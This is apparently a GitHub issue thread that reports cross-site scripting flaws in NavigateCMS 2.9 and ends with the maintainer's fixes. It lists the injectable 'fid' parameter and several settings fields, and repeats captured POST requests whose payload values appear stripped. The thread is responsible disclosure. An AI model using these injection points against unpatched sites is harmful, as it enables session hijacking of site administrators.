search

NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0
8 stars 4 forks source link

Cross Site Scripting Vulnerability funcition "fid" feature in NavigateCMS 2.9 #21

Closed Songohan22 closed 4 years ago

Songohan22 commented 4 years ago

Describe the bug An authenticated malicious user can take advantage of a Reflected XSS vulnerability on funciton "fid" feature in NavigateCMS 2.9 To Reproduce Steps to reproduce the behavior:

  1. Log into the panel.
  2. Go to "/navigate/navigate.php?fid=menus"
  3. Insert payload URL: /navigate/navigate.php?fid=>"'>
  4. /navigate/navigate.php??fid=blocks&act=edit"/>&id=3

    5. I think you fix it soon

NavigateCMS commented 4 years ago

Both already fixed in version 2.9.1, check out the new version released today. Thank you Songohan22.

Songohan22 commented 4 years ago

@NavigateCMS Nice...:D

Songohan22 commented 4 years ago

Hi @NavigateCMS

Cross Site Scripting Vulnerability funcition "tracking_script, mail_mailer[], language-variant-code[], language-locale[2], language-locale[1], language-id[2], language-id[1], file-name, comment_default_moderator, additional_styles, additional_scripts " feature in NavigateCMS 2.9

I think you fix it soon.

NavigateCMS commented 4 years ago

Can you provide an example for the fields additional_styles, additional_scripts and tracking_script? Thank you.

Songohan22 commented 4 years ago

tracking_ script Request: POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en Connection: Keep-Alive Host: 192.168.137.6:8765 X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f Content-Length: 4481 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Content-Type: multipart/form-data; boundary=

Content-Disposition: form-data; name="form-sent"

true

Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="title"

1234

Content-Disposition: form-data; name="protocol"

https://

Content-Disposition: form-data; name="subdomain"

1234

Content-Disposition: form-data; name="domain"

1234

Content-Disposition: form-data; name="folder"

1234

Content-Disposition: form-data; name="homepage_from_structure"

Content-Disposition: form-data; name="homepage"

25

Content-Disposition: form-data; name="wrong_path_action"

http_404

Content-Disposition: form-data; name="wrong_path_redirect"

Content-Disposition: form-data; name="empty_path_action"

theme_404

Content-Disposition: form-data; name="permission"

1 _ Content-Disposition: form-data; name="redirect_to"

1234

Content-Disposition: form-data; name="languages-order"

Content-Disposition: form-data; name="language-id[1]"

en

Content-Disposition: form-data; name="language-code[]"

25

Content-Disposition: form-data; name="language-variant[]"

1

Content-Disposition: form-data; name="language-variant-code[]"

25

Content-Disposition: form-data; name="language-locale[1]"

ENU_USA

Content-Disposition: form-data; name="language-published[]"

1

Content-Disposition: form-data; name="date_format"

Y-m-d

Content-Disposition: form-data; name="default_timezone"

UTC

Content-Disposition: form-data; name="website-decimal_separator"

.

Content-Disposition: form-data; name="website-thousands_separator"

,

Content-Disposition: form-data; name="website-default_currency"

usd

Content-Disposition: form-data; name="website-default_size_unit"

mm

Content-Disposition: form-data; name="website-default_weight_unit"

kg

Content-Disposition: form-data; name="word_separator"

_

Content-Disposition: form-data; name="resize_uploaded_images"

1600

Content-Disposition: form-data; name="website-favicon"

Content-Disposition: form-data; name="share_files_media_browser"

1

Content-Disposition: form-data; name="comments_enabled_for"

1

Content-Disposition: form-data; name="comments_default_moderator"

c_author

Content-Disposition: form-data; name="page_cache"

1

Content-Disposition: form-data; name="mail_mailer[]"

smtp

Content-Disposition: form-data; name="mail_server"

test@altoromutual.com

Content-Disposition: form-data; name="mail_port"

test@altoromutual.com

Content-Disposition: form-data; name="mail_security"

1

Content-Disposition: form-data; name="mail_ignore_ssl_security"

1

Content-Disposition: form-data; name="mail_user"

test@altoromutual.com

Content-Disposition: form-data; name="mail_address"

753 Main Street

Content-Disposition: form-data; name="mail_password"

test@altoromutual.com

Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com

Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts

Content-Disposition: form-data; name="tracking_scripts"

1234

Content-Disposition: form-data; name="additional_scripts"

1234 Content-Disposition: form-data; name="additional_styles" 1234

Songohan22 commented 4 years ago

additional_script Request: POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en Connection: Keep-Alive Host: 192.168.137.6:8765 X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f Content-Length: 4481 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Content-Type: multipart/form-data; boundary=

Content-Disposition: form-data; name="form-sent"

true

Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="title"

1234

Content-Disposition: form-data; name="protocol"

https://

Content-Disposition: form-data; name="subdomain"

1234

Content-Disposition: form-data; name="domain"

1234

Content-Disposition: form-data; name="folder"

1234

Content-Disposition: form-data; name="homepage_from_structure"

Content-Disposition: form-data; name="homepage"

25

Content-Disposition: form-data; name="wrong_path_action"

http_404

Content-Disposition: form-data; name="wrong_path_redirect"

Content-Disposition: form-data; name="empty_path_action"

theme_404

Content-Disposition: form-data; name="permission"

1

Content-Disposition: form-data; name="redirect_to"

1234

Content-Disposition: form-data; name="languages-order"

Content-Disposition: form-data; name="language-id[1]"

en

Content-Disposition: form-data; name="language-code[]"

25

Content-Disposition: form-data; name="language-variant[]"

1

Content-Disposition: form-data; name="language-variant-code[]"

25

Content-Disposition: form-data; name="language-locale[1]"

ENU_USA

Content-Disposition: form-data; name="language-published[]"

1

Content-Disposition: form-data; name="date_format"

Y-m-d

Content-Disposition: form-data; name="default_timezone"

UTC

Content-Disposition: form-data; name="website-decimal_separator"

.

Content-Disposition: form-data; name="website-thousands_separator"

,

Content-Disposition: form-data; name="website-default_currency"

usd

Content-Disposition: form-data; name="website-default_size_unit"

mm

Content-Disposition: form-data; name="website-default_weight_unit"

kg --AppScanBoundaryContent-Disposition: form-data; name="word_separator"

_

Content-Disposition: form-data; name="resize_uploaded_images"

1600

Content-Disposition: form-data; name="website-favicon"

Content-Disposition: form-data; name="share_files_media_browser"

1

Content-Disposition: form-data; name="comments_enabled_for"

1

Content-Disposition: form-data; name="comments_default_moderator"

c_author

Content-Disposition: form-data; name="page_cache"

1

Content-Disposition: form-data; name="mail_mailer[]"

smtp

Content-Disposition: form-data; name="mail_server"

test@altoromutual.com

Content-Disposition: form-data; name="mail_port"

test@altoromutual.com

Content-Disposition: form-data; name="mail_security"

1

Content-Disposition: form-data; name="mail_ignore_ssl_security"

1

Content-Disposition: form-data; name="mail_user"

test@altoromutual.com

Content-Disposition: form-data; name="mail_address"

753 Main Street

Content-Disposition: form-data; name="mail_password"

test@altoromutual.com

Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com

Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts

Content-Disposition: form-data; name="tracking_scripts"

1234

Content-Disposition: form-data; name="additional_scripts"

1234

Content-Disposition: form-data; name="additional_styles"

1234

Songohan22 commented 4 years ago

additional_styles Request: POST /navigate/navigate.php?fid=websites&act=edit HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Referer: http://192.168.137.6:8765/navigate/navigate.php?fid=websites&act=edit Cookie: navigate-tinymce-scroll=%7B%7D; PHPSESSID=r4pvjbe2eajff189vnug6ih0dl; NVSID_139cd01d0866df27=r4pvjbe2eajff189vnug6ih0dl; navigate-language=en Connection: Keep-Alive Host: 192.168.137.6:8765 X-Csrf-Token: cbc497d231626fdaf0f20f572629c51d95b330bd2feab29e1e8cae293b28f45f Content-Length: 4481 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Content-Type: multipart/form-data; boundary=

Content-Disposition: form-data; name="form-sent"

true

Content-Disposition: form-data; name="_nv_csrf_token"

00bf0473071bad58ae4f739a3a78db9412fa1409c556f09e428d545d158d307d

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="title"

1234

Content-Disposition: form-data; name="protocol"

https://

Content-Disposition: form-data; name="subdomain"

1234

Content-Disposition: form-data; name="domain"

1234

Content-Disposition: form-data; name="folder"

1234

Content-Disposition: form-data; name="homepage_from_structure"

Content-Disposition: form-data; name="homepage"

25

Content-Disposition: form-data; name="wrong_path_action"

http_404

Content-Disposition: form-data; name="wrong_path_redirect"

Content-Disposition: form-data; name="empty_path_action"

theme_404

Content-Disposition: form-data; name="permission"

1

Content-Disposition: form-data; name="redirect_to"

1234

Content-Disposition: form-data; name="languages-order"

Content-Disposition: form-data; name="language-id[1]"

en

Content-Disposition: form-data; name="language-code[]"

25

Content-Disposition: form-data; name="language-variant[]"

1

Content-Disposition: form-data; name="language-variant-code[]"

25

Content-Disposition: form-data; name="language-locale[1]"

ENU_USA

Content-Disposition: form-data; name="language-published[]"

1

Content-Disposition: form-data; name="date_format"

Y-m-d

Content-Disposition: form-data; name="default_timezone"

UTC

Content-Disposition: form-data; name="website-decimal_separator"

.

Content-Disposition: form-data; name="website-thousands_separator"

,

Content-Disposition: form-data; name="website-default_currency"

usd

Content-Disposition: form-data; name="website-default_size_unit"

mm

Content-Disposition: form-data; name="website-default_weight_unit"

kg

Content-Disposition: form-data; name="word_separator"

_

Content-Disposition: form-data; name="resize_uploaded_images"

1600

Content-Disposition: form-data; name="website-favicon"

Content-Disposition: form-data; name="share_files_media_browser"

1

Content-Disposition: form-data; name="comments_enabled_for"

1

Content-Disposition: form-data; name="comments_default_moderator"

c_author

Content-Disposition: form-data; name="page_cache"

1

Content-Disposition: form-data; name="mail_mailer[]"

smtp

Content-Disposition: form-data; name="mail_server"

test@altoromutual.com

Content-Disposition: form-data; name="mail_port"

test@altoromutual.com

Content-Disposition: form-data; name="mail_security"

1

Content-Disposition: form-data; name="mail_ignore_ssl_security"

1

Content-Disposition: form-data; name="mail_user"

test@altoromutual.com

Content-Disposition: form-data; name="mail_address"

753 Main Street

Content-Disposition: form-data; name="mail_password"

test@altoromutual.com

Content-Disposition: form-data; name="contact_emails"

test@altoromutual.com

Content-Disposition: form-data; name="website_additional_code[]"

tracking_scripts

Content-Disposition: form-data; name="tracking_scripts"

1234

Content-Disposition: form-data; name="additional_scripts"

1234

Content-Disposition: form-data; name="additional_styles"

1234

NavigateCMS commented 4 years ago

Fixed by 33ef8dffad685576db3b31ae6afc83b619c918f8 and 652c55f6dd6aa23f71d7ef34ac59dbd6e4ebf765